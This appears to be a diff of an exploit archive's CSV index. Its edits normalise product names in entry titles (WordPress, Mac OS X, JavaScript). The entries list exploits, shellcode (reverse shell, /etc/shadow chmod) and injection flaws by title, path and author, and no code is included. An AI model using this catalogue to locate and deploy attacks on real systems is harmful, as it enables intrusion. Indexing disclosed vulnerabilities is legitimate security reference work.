36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 -36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 - Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local,0 +36257,platforms/linux/local/36257.txt,"Trend Micro IWSS 3.1 - Privilege Escalation",2011-10-26,"Buguroo Offensive Security",linux,local,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 - Escape Sequence Stack Buffer Overflow Denial of Service",2011-10-28,"Marcel Bernhardt",windows,dos,0 @@ -32701,7 +32704,7 @@ id,file,description,date,author,platform,type,port 36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos,0 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps,0 -36271,platforms/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 +36271,platforms/osx/dos/36271.py,"Apple Mac OS X 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 36272,platforms/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusion",2011-11-01,indoushka,php,webapps,0 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 @@ -32716,7 +32719,7 @@ id,file,description,date,author,platform,type,port 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36285,platforms/windows/dos/36285.c,"Microsoft Windows - TCP/IP Stack Reference Counter Integer Overflow",2011-11-08,anonymous,windows,dos,0 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 -36287,platforms/php/webapps/36287.txt,"Wordpress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 +36287,platforms/php/webapps/36287.txt,"WordPress Bonus Theme 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 36288,platforms/multiple/dos/36288.php,"Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial Of Service",2011-11-04,"Maksymilian Arciemowicz",multiple,dos,0 36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 @@ -32726,17 +32729,17 @@ id,file,description,date,author,platform,type,port 36294,platforms/linux/local/36294.c,"Linux Kernel 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure",2011-11-07,"Vasiliy Kulikov",linux,local,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology - 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps,0 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Privilege Escalation",2011-11-09,IKCE,bsd,local,0 -36297,platforms/php/webapps/36297.txt,"AShop - Open-Redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0 +36297,platforms/php/webapps/36297.txt,"AShop - Open-redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0 36298,platforms/php/webapps/36298.txt,"Joomla! 1.9.3 - 'com_alfcontact' Extension Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36300,platforms/windows/dos/36300.py,"Kool Media Converter 2.6.0 - '.ogg' File Buffer Overflow",2011-11-11,swami,windows,dos,0 -36301,platforms/php/webapps/36301.txt,"Wordpress Download Manager 2.7.2 Plugin - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 +36301,platforms/php/webapps/36301.txt,"WordPress Download Manager 2.7.2 Plugin - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 36302,platforms/php/webapps/36302.txt,"Joomla Content Component - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution",2015-03-06,Metasploit,windows,remote,5555 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 -36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - admin_index.php SITE_NAME Parameter Cross-Site Scripting",2011-11-13,"Gjoko Krstic",php,webapps,0 +36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - admin_index.php site_name Parameter Cross-Site Scripting",2011-11-13,"Gjoko Krstic",php,webapps,0 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 - 'pid' Parameter SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash (PoC)",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36310,platforms/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 @@ -32744,16 +32747,16 @@ id,file,description,date,author,platform,type,port 36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 - reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 - reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 -36317,platforms/php/webapps/36317.txt,"Wordpress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 +36317,platforms/php/webapps/36317.txt,"WordPress Flexible Custom Post Type plugin - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 -36320,platforms/php/webapps/36320.txt,"Codoforum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 +36320,platforms/php/webapps/36320.txt,"CodoForum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 36321,platforms/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 36322,platforms/php/webapps/36322.txt,"Digital Attic Foundation CMS - 'id' Parameter SQL Injection",2011-11-20,tempe_mendoan,php,webapps,0 -36323,platforms/php/webapps/36323.txt,"Wordpress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 -36324,platforms/php/webapps/36324.txt,"Wordpress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 -36325,platforms/php/webapps/36325.txt,"Wordpress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 -36326,platforms/php/webapps/36326.txt,"Wordpress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 +36323,platforms/php/webapps/36323.txt,"WordPress Alert Before Your Post Plugin - 'name' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36324,platforms/php/webapps/36324.txt,"WordPress Advanced Text Widget Plugin 2.0 - 'page' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 +36325,platforms/php/webapps/36325.txt,"WordPress Adminimize Plugin 1.7.21 - 'page' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36326,platforms/php/webapps/36326.txt,"WordPress Lanoba Social Plugin 1.0 - 'action' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 - Kernel 'win32k.sys' Keyboard Layout Privilege Escalation",2011-11-22,instruder,windows,local,0 36328,platforms/php/webapps/36328.txt,"TA.CMS - (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 36329,platforms/php/webapps/36329.txt,"TA.CMS - (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 @@ -32765,9 +32768,9 @@ id,file,description,date,author,platform,type,port 36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion - Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 36336,platforms/windows/dos/36336.txt,"Microsoft Windows - Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 -36338,platforms/php/webapps/36338.txt,"Wordpress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 -36339,platforms/php/webapps/36339.txt,"Wordpress Featurific For Wordpress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 -36340,platforms/php/webapps/36340.txt,"Wordpress Newsletter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36340,platforms/php/webapps/36340.txt,"WordPress NewsLetter Meenews Plugin 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - modules/mondialrelay/googlemap.php Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 @@ -32791,18 +32794,18 @@ id,file,description,date,author,platform,type,port 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free",2015-03-12,Metasploit,windows,remote,0 36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service",2011-11-25,"Houssam Sahli",windows,dos,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 -36363,platforms/php/webapps/36363.txt,"Wordpress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 +36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 -36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 -36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - /admin/admin_blocks.php Filename Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - /admin/admin_pages.php Filename Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",php,webapps,0 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",xml,webapps,0 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0 -36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0 +36372,platforms/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0 36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 -36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 +36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request NULL Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 @@ -32810,8 +32813,8 @@ id,file,description,date,author,platform,type,port 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36382,platforms/php/webapps/36382.txt,"Wordpress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 -36383,platforms/php/webapps/36383.txt,"Wordpress flash-album-gallery Plugin - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 +36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-Slideshow-flash Plugin 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 +36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL Injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 @@ -32824,22 +32827,22 @@ id,file,description,date,author,platform,type,port 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Obfuscated map google.com to 127.1.1.1 Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - Obfuscated execve(_/bin/sh_) Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36481,platforms/php/webapps/36481.txt,"Wordpress TheCartPress Plugin 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0 +36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 - 'OptionsPostsList.php' Cross-Site Scripting",2011-12-31,6Scan,php,webapps,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 - administrator/index.php URI Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",php,webapps,0 -36408,platforms/php/webapps/36408.txt,"Wordpress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 +36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe - Remote Command Execution",2015-03-16,Metasploit,windows,remote,0 -36413,platforms/php/webapps/36413.txt,"Wordpress SEO by Yoast 1.7.3.3 Plugin - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 +36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 Plugin - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 - Heap Memory Corruption",2011-12-02,"High-Tech Bridge SA",windows,dos,0 36404,platforms/linux/dos/36404.c,"GNU glibc - Timezone Parsing Remote Integer Overflow",2009-06-01,dividead,linux,dos,0 -36414,platforms/php/webapps/36414.txt,"Wordpress WPML 3.1.9 Plugin - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 +36414,platforms/php/webapps/36414.txt,"WordPress WPML 3.1.9 Plugin - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass",2015-03-16,Metasploit,java,remote,9200 36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 -36483,platforms/php/webapps/36483.txt,"Wordpress WP Live.php 1.2.1 Plugin - 's' Parameter Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 +36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 Plugin - 's' Parameter Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Parameter Cross-Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Parameter Cross-Site Scripting",2012-01-02,sonyy,php,webapps,0 36486,platforms/php/webapps/36486.txt,"Tienda Virtual - 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",php,webapps,0 @@ -32849,31 +32852,31 @@ id,file,description,date,author,platform,type,port 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player - PCRE Regex",2015-03-17,Metasploit,windows,remote,0 36421,platforms/linux/remote/36421.rb,"Exim GHOST - (glibc gethostbyname) Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",linux,remote,25 36783,platforms/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash (PoC)",2015-04-17,sajith,windows,dos,0 -36480,platforms/multiple/remote/36480.rb,"Firefox - Proxy Prototype Privileged Javascript Injection",2015-03-24,Metasploit,multiple,remote,0 +36480,platforms/multiple/remote/36480.rb,"Firefox - Proxy Prototype Privileged JavaScript Injection",2015-03-24,Metasploit,multiple,remote,0 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager - Command Injection",2015-03-18,"Han Sahin",java,webapps,9447 -36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 +36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 36425,platforms/linux/dos/36425.txt,"Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service",2011-12-06,"Serge Hallyn",linux,dos,0 36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 - Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 36429,platforms/hardware/remote/36429.txt,"HomeSeer HS2 2.5.0.20 - Web Interface Log Viewer Page URI Cross-Site Scripting",2011-12-08,"Silent Dream",hardware,remote,0 36430,platforms/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Privilege Escalation",2011-12-08,anonymous,linux,local,0 -36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - (.tga) Crash (PoC)",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 +36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - '.tga' Crash (PoC)",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36432,platforms/php/webapps/36432.txt,"Pet Listing - 'preview.php' Cross-Site Scripting",2011-12-09,Mr.PaPaRoSSe,php,webapps,0 36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player - ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos,0 -36434,platforms/php/webapps/36434.txt,"Wordpress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0 +36434,platforms/php/webapps/36434.txt,"WordPress GRAND FlAGallery Plugin 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0 36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 36437,platforms/windows/local/36437.rb,"Publish-It - PUI Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins - Remote Code Execution",2015-03-19,Metasploit,php,remote,80 -36439,platforms/php/webapps/36439.txt,"Joomla ECommerce-WD Plugin 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80 +36439,platforms/php/webapps/36439.txt,"Joomla eCommerce-WD Plugin 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 36441,platforms/xml/webapps/36441.txt,"Citrix Command Center - Credential Disclosure",2015-03-19,"Han Sahin",xml,webapps,8443 36442,platforms/linux/webapps/36442.txt,"Citrix Nitro SDK - Command Injection",2015-03-19,"Han Sahin",linux,webapps,0 36443,platforms/windows/dos/36443.txt,"Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0 -36444,platforms/php/webapps/36444.txt,"Wordpress flash-album-gallery Plugin - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0 -36445,platforms/php/webapps/36445.txt,"Wordpress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 +36444,platforms/php/webapps/36444.txt,"WordPress flash-album-gallery Plugin - 'flagshow.php' Cross-Site Scripting",2011-12-13,Am!r,php,webapps,0 +36445,platforms/php/webapps/36445.txt,"WordPress The Welcomizer Plugin 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 @@ -32894,7 +32897,7 @@ id,file,description,date,author,platform,type,port 36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0 36464,platforms/php/webapps/36464.txt,"Joomla Spider FAQ Component - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0 36465,platforms/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",windows,local,0 -36466,platforms/php/webapps/36466.txt,"Wordpress Marketplace 2.4.0 Plugin - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 +36466,platforms/php/webapps/36466.txt,"WordPress Marketplace 2.4.0 Plugin - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0 36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0 36469,platforms/php/webapps/36469.txt,"Joomla! 'com_tsonymf' Component - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0 36470,platforms/php/webapps/36470.txt,"Tiki Wiki CMS Groupware 8.1 - 'show_errors' Parameter HTML Injection",2011-12-20,"Stefan Schurtz",php,webapps,0 @@ -32905,19 +32908,19 @@ id,file,description,date,author,platform,type,port 36475,platforms/hardware/remote/36475.txt,"Barracuda Control Center 620 - Cross-Site Scripting / HTML Injection",2011-12-21,Vulnerability-Lab,hardware,remote,0 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus - '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",windows,local,0 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0 -36478,platforms/php/webapps/36478.php,"Wordpress Plugin InBoundio 